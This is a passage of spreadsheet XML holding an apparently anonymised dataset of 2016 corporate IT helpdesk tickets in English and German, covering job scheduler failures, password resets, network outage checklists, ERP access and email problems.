job Job_714 failed in job_scheduler at: 08/23/2016 06:11:00</t>
  </si>
  <si>
    <t>please run job jb_cust_db_file. please assign ticket to ebusaar munnangi</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
could you please run the job jb_cust_db_file_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cross company in erp not allowed</t>
  </si>
  <si>
    <t>on transactions f-43 and f-60, user can no longer process transactions.  please assist in restoring this.</t>
  </si>
  <si>
    <t>wifevnpm bkcixfjd</t>
  </si>
  <si>
    <t>npc 311104334 mm6283517</t>
  </si>
  <si>
    <t xml:space="preserve">hello it service,
my manager serthyei needs to forward the pthsqroz moedyanvess, all the quote drawings are being created and linked to the mm#s as our standard procedure.
for un known reason, this mm 7394628 is not showing the linked drawing. moreover, serthyei was not able to add the document number manually.
please fix this, we need to forward the npc towards successful manufacturing.
crtgyerine: vlymsnej.whlqxcst@gmail.com
serthyei: ueywbzks.gepstmfl@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">erp hcm: zpd_upload_time </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jywvemun.qngschtz@gmail.com
erp team,
we need to update the report zpd_upload_time for erp hcm
because of the new 8 digits employee numbers.
please see below.
srgtycha
von: jfcrdavy sxpotjlu
gesendet: dienstag, 23. august 2016 11:10
an: weszfyok fbadnjhu &lt;weszfyok.fbadnjhu@gmail.com&gt;; jywvemun qngschtz &lt;jywvemun.qngschtz@gmail.com&gt;
cc: pesylifc wnyierbu &lt;pesylifc.wnyierbu@gmail.com&gt;; lixwgnto krutnylz &lt;lixwgnto.krutnylz@gmail.com&gt;; puxsvfwr cwkjruni &lt;puxsvfwr.cwkjruni@gmail.com&gt;
betreff: aw: inc1530735 -- comments added
hallo zusammen,
im erp upload-programdntym zpd_upload_time muss die pernr ebenfalls von 6 stellen
auf die max. lÃ¤nge von 8 stellen angepasst werden:
[cid:image001.png@01d1fd2e.708348b0]
bitte entsprechend veranlassen.
mit freundlichen grÃ¼ÃŸen
jfcrdavy sxpotjlu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</si>
  <si>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jywvemun qngschtz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/23/2016 05:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/23/2016 05:21:00</t>
  </si>
  <si>
    <t>fehler wie gehabt  - inplant_852536</t>
  </si>
  <si>
    <t>datenbanken lassen sich noch nicht Ã¶ffnen_x000D_
habe pc zuvor neugestartet</t>
  </si>
  <si>
    <t>zugriff auf betriebsmittedatenbank ce_cs funktioniert nicht!!!</t>
  </si>
  <si>
    <t>for error message "inwarehouse_tool document still contails message"</t>
  </si>
  <si>
    <t>can't posting in t-code miro.  error message is "inwarehouse_tool document still contains message" about po 5616637384,4505601201</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/23/2016 04:34:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/23/2016 04:34:00</t>
  </si>
  <si>
    <t>def. montitor wechseln</t>
  </si>
  <si>
    <t>bitte den def. monitor von der lÃ¼ftungssteuerung im heizraum tauschen. _x000D_
kontakt : rÃ¶ssler christgrytian -189</t>
  </si>
  <si>
    <t>access requited for vl02n for post goods issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wrelsfqa.qfwosjkh@gmail.com_x000D_
_x000D_
good morning_x000D_
_x000D_
please can you usa access to myself and gydtvnlw miepcwzf to enable us to do the post goods issues for return deliveries. nieghjyukea for angelique and coetzk for myself._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>outlook hangs / does not open</t>
  </si>
  <si>
    <t>circuit outage  vogelfontein :company-eu-zaf-vogelfontein-dmvpn-1941  down since 8/23/2016 2:56 am est (site up on primary)</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______8/23/2016 2:56 am est_______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  ___yes______     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint____no____ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____yes___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___email______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___yes________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___na________    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _____yes__     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________na_________________       _x000D_
_x000D_
12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?____na____    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_512 failed in job_scheduler at: 08/23/2016 03:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_512 failed in job_scheduler at: 08/23/2016 03:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_495 failed in job_scheduler at: 08/23/2016 03:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_495 failed in job_scheduler at: 08/23/2016 03:30:00</t>
  </si>
  <si>
    <t>r216 maus defekt</t>
  </si>
  <si>
    <t>pc an reinecker wzs60 wahrscheinlich defekt. maschine steht.</t>
  </si>
  <si>
    <t>emjalxih bcetgmhr</t>
  </si>
  <si>
    <t xml:space="preserve">outlook is prompting for password </t>
  </si>
  <si>
    <t>urxvagbn sibmvrqc</t>
  </si>
  <si>
    <t>drucker geht nach tonerwechsel nicht mehr</t>
  </si>
  <si>
    <t>ijsptgkh giojsnqz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2662 failed in job_scheduler at: 08/23/2016 02:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2662 failed in job_scheduler at: 08/23/2016 02:46:00</t>
  </si>
  <si>
    <t>lÃ¼fter defekt \rechner fÃ¼r videoÃ¼berwachung</t>
  </si>
  <si>
    <t>usb keybankr/monitor</t>
  </si>
  <si>
    <t>requested for usb keybankrd and external monitor for new desk space.</t>
  </si>
  <si>
    <t>he get the error "documenttype no available for backend system" see attached error messages in purchasing_x000D_
for other users it works. seems to be something in his usersettings.</t>
  </si>
  <si>
    <t>setup rechner ewew8323869 \wrcktgbd wzrgyunp</t>
  </si>
  <si>
    <t>ich benÃ¶tige netzwerkkabel fÃ¼r den teleservice bei roboworker.</t>
  </si>
  <si>
    <t xml:space="preserve">hallo herr bghakch,_x000D_
ich benÃ¶tige netzwerkkabel fÃ¼r den teleservice bei roboworker._x000D_
benÃ¶tigt werden 3x 10m und 3x 5m die dauerhaft angeschlossen bleiben._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>probleme mit lan Ã­n beschprechungsraum \puxsvfwr cwkjruni</t>
  </si>
  <si>
    <t>account names not seems on crm</t>
  </si>
  <si>
    <t xml:space="preserve">i have issue when i try to create oppurtunities on crm. i didn't see any account name. normally it's working on connect and engineering_tool. please help to solve this issue. </t>
  </si>
  <si>
    <t>conversion issue with the drawing nxd/71880207/000/00</t>
  </si>
  <si>
    <t xml:space="preserve">1.)     only pdf got converted and accessible, model and dxf are not accesible_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ahmfwdxp frkmcqhg</t>
  </si>
  <si>
    <t>attendance_tool issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ufgkybsh.ijswtdve@gmail.com_x000D_
_x000D_
dear sir/mam,_x000D_
_x000D_
i am facing issue with attendance_tool . the following message is showing and it is not showing in single sign in portal also._x000D_
_x000D_
kindly help me to resolve the issue._x000D_
_x000D_
[cid:image001.jpg@01d1fd31.c82afba0][cid:image002.jpg@01d1fd31.c82afba0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ofwxjriq rwcxkflq</t>
  </si>
  <si>
    <t>after changing my login id password in password_management_tool password manger, which was successful. i restarted my system, outlook/sky</t>
  </si>
  <si>
    <t>name:wnorzsyv mdflqwxg
language:
browser:microsoft internet explorer
email:wnorzsyv.mdflqwxg@gmail.com
customer number:
telephone:
summary:after changing my login id password in password_management_tool password manger, which was successful. i restarted my system, outlook/skype is popping up with password request but not logging in</t>
  </si>
  <si>
    <t xml:space="preserve">unable to send or receive email </t>
  </si>
  <si>
    <t>vmbltjsf gwryhfbe</t>
  </si>
  <si>
    <t>unable to login into attendance_tool</t>
  </si>
  <si>
    <t>i am unable to login to attendance_tool using single logon portal link.</t>
  </si>
  <si>
    <t>iqpuxcbj nbaztpms</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/23/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_tooldplcmmaninp failed in job_scheduler at: 08/23/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_tooldplcmmaninp failed in job_scheduler at: 08/23/2016 00:02:00</t>
  </si>
  <si>
    <t>khgfbrdo vjxopikc</t>
  </si>
  <si>
    <t>awyw7217971</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: utgszjrf.pacfvxzk@gmail.com
please attend the below mentioned problem at the earliest.
system name : awyw8328082
user name : talagrtymr
problem: display not coming on monitor, system is getting on and off continiously
best </t>
  </si>
  <si>
    <t>microsoft office software have problem, couldn't access link and pop up warning of "computer limitation"</t>
  </si>
  <si>
    <t>contact phone: +86
system: windows 7
error messages: please refer to attachment</t>
  </si>
  <si>
    <t>htzauevc nhxlvkta</t>
  </si>
  <si>
    <t xml:space="preserve">shipping notification </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bfckamsg.tzdkbmfe@gmail.com_x000D_
_x000D_
hi it help_x000D_
would you please help set the email of shipping notification for customer 81032999. </t>
  </si>
  <si>
    <t>bfckamsg tzdkbmfe</t>
  </si>
  <si>
    <t>network outage ::  company-eu-che-company-switzerland-2-dmvpn-1811-rtr01(no backup) :: since # 8/22/2016 9:35 pm est</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __na_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________8/22/2016 9:35 pm est______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _____no__    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____yes____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______no____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  __na_____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ___________swisscom______________       _x000D_
_x000D_
12. notified  gsc  ___yes_____     (yes/no/na)    cert started  ?_____naa___    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 22:02:00</t>
  </si>
  <si>
    <t>ksem / wzs60 / m1 (m07.15360)</t>
  </si>
  <si>
    <t>pc defekt, ist selbststÃ¤ndig runter gefahren und lÃ¤sst sich nicht mehr starten._x000D_
bitte um erledigung durch m. himghtmelreich</t>
  </si>
  <si>
    <t>advanced search does not use the material field on the form</t>
  </si>
  <si>
    <t>the same set of results is returned regardless if leaving the field blank or selecting any material.</t>
  </si>
  <si>
    <t>not able to open jpg image files.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ulroqsyf.wctpnarb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to open jpg image files on my pc._x000D_
pl. help._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lorw8327797sf(usa robot):outlook did not complete on time had to be kirtyled alert in reporting_tool since 08/22 12:59 pm et</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1953d failed in job_scheduler at: 08/22/2016 18:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1953d failed in job_scheduler at: 08/22/2016 18:03:00</t>
  </si>
  <si>
    <t>job Job_1953d :was running longer than 30 minutes</t>
  </si>
  <si>
    <t>usa has 2 unresolved mii password lockouts-employees got  "user authentication failed" error-cannot confirm production</t>
  </si>
  <si>
    <t xml:space="preserve">hi all, 
we had 3-4 occurences where people got a "user authentication failed" error: 
1)      tortm hortl (howthrelte)
2)      yqxlbswt eimhxowu (tnhymatj) - unresolved
3)      ligsnzur smcxerwk (grargtfl) - unresolved
could you please check the root cause and unlock the operators' passwords so they can log into mii and report production 
for lee, we were able to get through to password_management_tool and unlock the password â€“ he will try in 20 mins to see if it works
for the others, i got a "failed to verify password on active directory" error when we tried to get into password_management_tool
it helped unlock tony's password but we got the same error after 30 minutes 
i was only able to resolve tortm hortl's password issue before the end of the shift. 
</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_tooldplcmmaninp failed in job_scheduler at: 08/22/2016 17:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_tooldplcmmaninp failed in job_scheduler at: 08/22/2016 17:07:00</t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: blue screen error.urgent </t>
  </si>
  <si>
    <t xml:space="preserve">dell 7350: blue screen error
-user has tried to recover and safe mode and restart , all the 3 opetions done help.
-service tag: 80sjv32
-asset tag: 405429
-os: win 8.1
-c: </t>
  </si>
  <si>
    <t>dalhjmcn fisvztuy</t>
  </si>
  <si>
    <t>distributor_tool page error</t>
  </si>
  <si>
    <t>did we send out automatic erp gui upgrade</t>
  </si>
  <si>
    <t>name:stefdgthyo
language:
browser:microsoft internet explorer
email:ejpvuxrg.tryaibcx@gmail.com
customer number:
telephone:+1 
summary:did we send out automatic erp gui upgrade?</t>
  </si>
  <si>
    <t>network outage :india, india - (company) hard down since 1:17 pm on 08/22 et</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____1:17 pm on 08/22 et__________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? __na_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____na___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____na_____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na_______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___na____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ____na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>vpn connection issues.</t>
  </si>
  <si>
    <t xml:space="preserve">vpn connection issues._x000D_
-connected to the user system using teamviewer._x000D_
-changed the default browser ._x000D_
-advised the caller to logon to the company vpn._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail2 failed in job_scheduler at: 08/22/2016 15:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail2 failed in job_scheduler at: 08/22/2016 15:45:00</t>
  </si>
  <si>
    <t>mobile device activation for the new iphone</t>
  </si>
  <si>
    <t>hvjmxkcp pvzlgeyw</t>
  </si>
  <si>
    <t>decimal values in "daily qty confirmed"</t>
  </si>
  <si>
    <t>usa plant, work center preeco showing 4840.1 in mentioned field_x000D_
_x000D_
for reference:_x000D_
_x000D_
collaboration_platform:#decimal%20values%20in%20%22daily%20qty%20confirmed%22&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={f3cce32e-bc9f-426d-a364-92434990ca0f}&amp;end</t>
  </si>
  <si>
    <t>otd to frozen date alert issue</t>
  </si>
  <si>
    <t>in supervisor dashbankrd the "otd to frozen date" alert is not populating correctly_x000D_
_x000D_
for reference:_x000D_
_x000D_
collaboration_platform:#re%20otd%20to%20frozen%20date%20alert&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={aa19plant_19-415f-43de-90ac-dac4af090b67}&amp;end</t>
  </si>
  <si>
    <t>setup time not calculated properly</t>
  </si>
  <si>
    <t>email from kanchi (usa) on how confirmation times are calculated in mii. _x000D_
_x000D_
in one example kahrthyeui found out that mii was using work center or factory calendar (excluding weekend time from calculation) but in other cases it was not. _x000D_
_x000D_
more details on page _x000D_
_x000D_
_x000D_
collaboration_platform:#re%20time%20calculations%20in%20erp%20/%20mii&amp;section-id={b02cc616-a796-4ab6-bc94-98de524924ae}&amp;page-id={e2181c91-05d2-418e-999a-1475f818a343}&amp;end</t>
  </si>
  <si>
    <t>global erp crm:  please investigate why agbighyail espinosa's employee account in erp crm is not recognized as an employee.  please refer to the screenshots in the attached email.  wdkaoneh unqlarpk is an employee, but her employee account in erp crm is not displayed if you search using "role is employee".  you can only find her employee account in erp crm if you don't specify "role is employee".</t>
  </si>
  <si>
    <t>can't search work center # in machine # field in collective confirmation (header level)</t>
  </si>
  <si>
    <t>erp-mii_x000D_
_x000D_
we can search machine numbers by typing work center numbers in the pop up box of machine field. this works in time event and normal confirmation but does not work in collective header level</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail1 failed in job_scheduler at: 08/22/2016 15:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail1 failed in job_scheduler at: 08/22/2016 15:00:00</t>
  </si>
  <si>
    <t>cannot change in conditions tab</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
hello,_x000D_
it appears i don't have access to change any values in the conditions tab.  please review for the issue, as i need to complete this quote and convert to usd/kg instead of rub/kg._x000D_
_x000D_
[cid:image001.png@01d1fc7d.3c4918b0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reset passwords for pzjelyxg vstyaouc using password_management_tool password reset.</t>
  </si>
  <si>
    <t>pzjelyxg vstyaouc</t>
  </si>
  <si>
    <t>ticket update on ticket_no0432805</t>
  </si>
  <si>
    <t>quadra chek pc in the eaymvrzj bumzwtco will not start, power is connected but nthing when button is pressed.</t>
  </si>
  <si>
    <t>nwgcbfdt ahmbnsoi</t>
  </si>
  <si>
    <t>collaboration_platform site  ownership</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: unrbafjx.reyshakw@gmail.com_x000D_
_x000D_
hello it help,_x000D_
_x000D_
since the owner has left the company, please reallocate the ownership of this subsite to my name. </t>
  </si>
  <si>
    <t>vip 2 // unable to open any files from collaboration_platform</t>
  </si>
  <si>
    <t>stdezpqw bkmeuhfz has never been able to open any kind of files from collaboration_platform. it keeps on asking her for email address and password and even after entering it keeps coming back.</t>
  </si>
  <si>
    <t>cannot access to company collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zywoxerf.paqxtrfk@gmail.com_x000D_
_x000D_
dear it:_x000D_
i either cannot access to company collaboration_platform or after the "company collaboration_platform" page stuck at a blank page of "outlook.office365.com" as shown below._x000D_
_x000D_
_x000D_
[cid:image001.png@01d1fc73.23ca3cb0]_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp order acknowledgement weight difference</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please review the quantity on the attached  order acknowledgement._x000D_
in the quantity column the weight of 4.536 kg is correct._x000D_
in the description field the qty is 3.000 kg.  this is incorrect._x000D_
correct the quantity value to be 4.536 kg in both areas._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to load collaboration_platform</t>
  </si>
  <si>
    <t>shpnkgir mpsycbxl</t>
  </si>
  <si>
    <t>india company: tcl circuit intermittently flapping since at 12:50 pm est on 08/22. site is active on primary.</t>
  </si>
  <si>
    <t>intermittent flap in tcl link.. tcl#3740oc220816.</t>
  </si>
  <si>
    <t>having to approve the same credit memo several times.</t>
  </si>
  <si>
    <t xml:space="preserve">please review the approver level for stefyty ross (director of sales).  at times, i am having to approve the same credit memo 2 to 3 times in workflow.  this should not be happening. </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to the replacement laptop as its showing no connection to server. </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1374 failed in job_scheduler at: 08/22/2016 13:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1374 failed in job_scheduler at: 08/22/2016 13:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">account locked </t>
  </si>
  <si>
    <t>cvjdqazg ejdnpytr</t>
  </si>
  <si>
    <t>skype connectivity is flickering: automatically signout and signing in back. no sfb online outage from server end.</t>
  </si>
  <si>
    <t xml:space="preserve">network team,_x000D_
_x000D_
kindly look into the below issue:_x000D_
_x000D_
skype connectivity is flickering: automatically sign-out and signing in back. no sfb online outage from office 365 server end._x000D_
_x000D_
issue is with multiple user. kindly keep the ticket priority as sev 3 till the issue is resolved._x000D_
</t>
  </si>
  <si>
    <t>qasouhlc xkhsirtd</t>
  </si>
  <si>
    <t>unable access - net weaver</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rhwvpmlq.zuwhpqrc@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
i am unable to access the below . kindly do the needful._x000D_
_x000D_
_x000D_
[cid:image001.png@01d1fcc3.37c4c640]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>team sproc is not assigning indirect revenue</t>
  </si>
  <si>
    <t>the tam sproc is incorrectly inner joining previous ytd revenue when it should be left joining so that it wont result in an empty result set if there is no previous revenue (aka the first period of a financial_toolcal year)</t>
  </si>
  <si>
    <t>fqxnplkb cqhnavfp</t>
  </si>
  <si>
    <t>pikosa cannot log into work station</t>
  </si>
  <si>
    <t>hello,_x000D_
xepcsrvh tbsokfyl for several days cannot log into her workstation, because telephony_software says it is used, but does not specify by whom (screenshot in the attachment). the station she wants to log into is hers and she had always used. please advise.</t>
  </si>
  <si>
    <t>download drawing response is error even though a succesful email is received</t>
  </si>
  <si>
    <t xml:space="preserve">when i send the input to download a drawing, i always get a reply "email not sent" but i still get the email. for example, below input _x000D_
_x000D_
        {_x000D_
           "i_mail_inputs":_x000D_
           {_x000D_
             "sales_doc":"",_x000D_
             "delivery_doc":"",_x000D_
             "billing_doc":"",_x000D_
             "purchasing_doc":"",_x000D_
             "pur_sch_agr":"",_x000D_
             "mat_drawing":"x",_x000D_
             "doc_num":"3115968804",_x000D_
             "language":"e",_x000D_
             "mail_id":"tskwevno.sjhpoakl@gmail.com",_x000D_
             "download_flag":""_x000D_
          }_x000D_
        }_x000D_
_x000D_
the document number has a special material in it which has a pdf drawing. when i send the above input, i expect it sends email and it definitely sends the email fine. however, the reply i get from erp always is "email not sent" which does not make sense as i do get the email._x000D_
important â€“ the downloading of file to ftp site works fine. it is just not returning a valid message even when it successfully send the email._x000D_
</t>
  </si>
  <si>
    <t>afslkeui qgzfptjw</t>
  </si>
  <si>
    <t>network outage :kingston, pa :site is hard down since at 10:19 am et on 08/22.no backup</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______10:19 am et on 08/22________________x000D_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</si>
  <si>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circuit outage:usa, nv - divestiture site:secondary circuit is down since at 10:23 am et on 08/22.primary is up.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______10:23 am et on 08/22________________x000D_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</si>
  <si>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emails</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: raifstow.gfeymtql@gmail.com
hello,
i need 4 email account tabs removed from my main email and then 2 new ones added.
needs to be removed:
k-hntl usa-grind
w-hntl usa-grind
k-na westcoast rrc
w-na westcoast rrc
ones to be added:
w-rckf.grind@company.com&lt;mailto:w-rckf.grind@company.com&gt;
w-rckf.grind@company.com&lt;mailto:w-rckf.grind@company.com&gt;
</t>
  </si>
  <si>
    <t>circuit outage:vogelfontein, south africa , sa secondary circuit is down since at 5:41 am et on 08/22.primary circuit is up.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___5:41 am et on 08/22___________________x000D_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____yes____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____email_____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</si>
  <si>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roadking features</t>
  </si>
  <si>
    <t>the features on the road king page are not expanding. on click, there is a div container that is supposed to open up and show additional content. this is no longer working._x000D_
_x000D_
page:_x000D_
_x000D_
_x000D_
_x000D_
see screenshot attached.</t>
  </si>
  <si>
    <t>probleme mit vpn client</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fmhlugqk.dpraethi@gmail.com_x000D_
_x000D_
hallo meine herren,_x000D_
_x000D_
ich kann unsere vpn nicht benutzen._x000D_
folgende fehlermeldungen habe ich bekommen:_x000D_
_x000D_
2mal kommt diese:_x000D_
[cid:image001.png@01d1fc9a.c5af05c0]_x000D_
_x000D_
bei dritte probieren:_x000D_
[cid:image002.png@01d1fc9a.c5af05c0]_x000D_
_x000D_
benutzername und kennwort war in ordnung._x000D_
bitte es kontrollieren und lÃ¶sen._x000D_
_x000D_
danke_x000D_
_x000D_
Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>require access to canadian legal reporting website...thank you in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wznkpjis.rantlypb@gmail.com
[cid:image001.png@01d1fc62.e2977201]
wznkpjis rantlypb, b.sc., tsrp
sr. ehs analyst
wznkpjis.rantlypb@gmail.com&lt;mailto:wznkpjis.rantlypb@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">user not able to connect to t drive </t>
  </si>
  <si>
    <t>request to reset microsoft online services password for aedzqlvj.mkosyxgh@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
from: nwfodmhc exurcwkm _x000D_
sent: monday, august 22, 2016 3:21 pm_x000D_
to: bmhxwvys tdmgolwn_x000D_
cc: tiyhum kuyiomar_x000D_
subject: re: sabrthy request to reset microsoft online services password for bmhxwvys.tdmgolwn@gmail.com_x000D_
_x000D_
hi suhrhtyju,_x000D_
_x000D_
please reset your password in _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>aedzqlvj mkosyxgh</t>
  </si>
  <si>
    <t>crqonkxm ipyazqjx</t>
  </si>
  <si>
    <t>tmbxvipy knsdqlbx</t>
  </si>
  <si>
    <t xml:space="preserve"> request to reset microsoft online services password for bmhxwvys.tdmgolwn@gmail.com</t>
  </si>
  <si>
    <t>bmhxwvys tdmgolwn</t>
  </si>
  <si>
    <t>skype calls not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pyrtfdxu.nxfkqmoy@gmail.com_x000D_
_x000D_
i can't make a skype call through my pc.  i can't hear them and they can't hear me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>logon missing in erp</t>
  </si>
  <si>
    <t>name:mitctdrh whaley
language:
browser:microsoft internet explorer
email:trhuymvb.egpcwrkj@gmail.com
customer number:
telephone:
summary:erp issue, cant login! login not available</t>
  </si>
  <si>
    <t>trhuymvb egpcwrkj</t>
  </si>
  <si>
    <t>symantec software message</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: doxmlcpr.xjheyscu@gmail.com_x000D_
_x000D_
hi,_x000D_
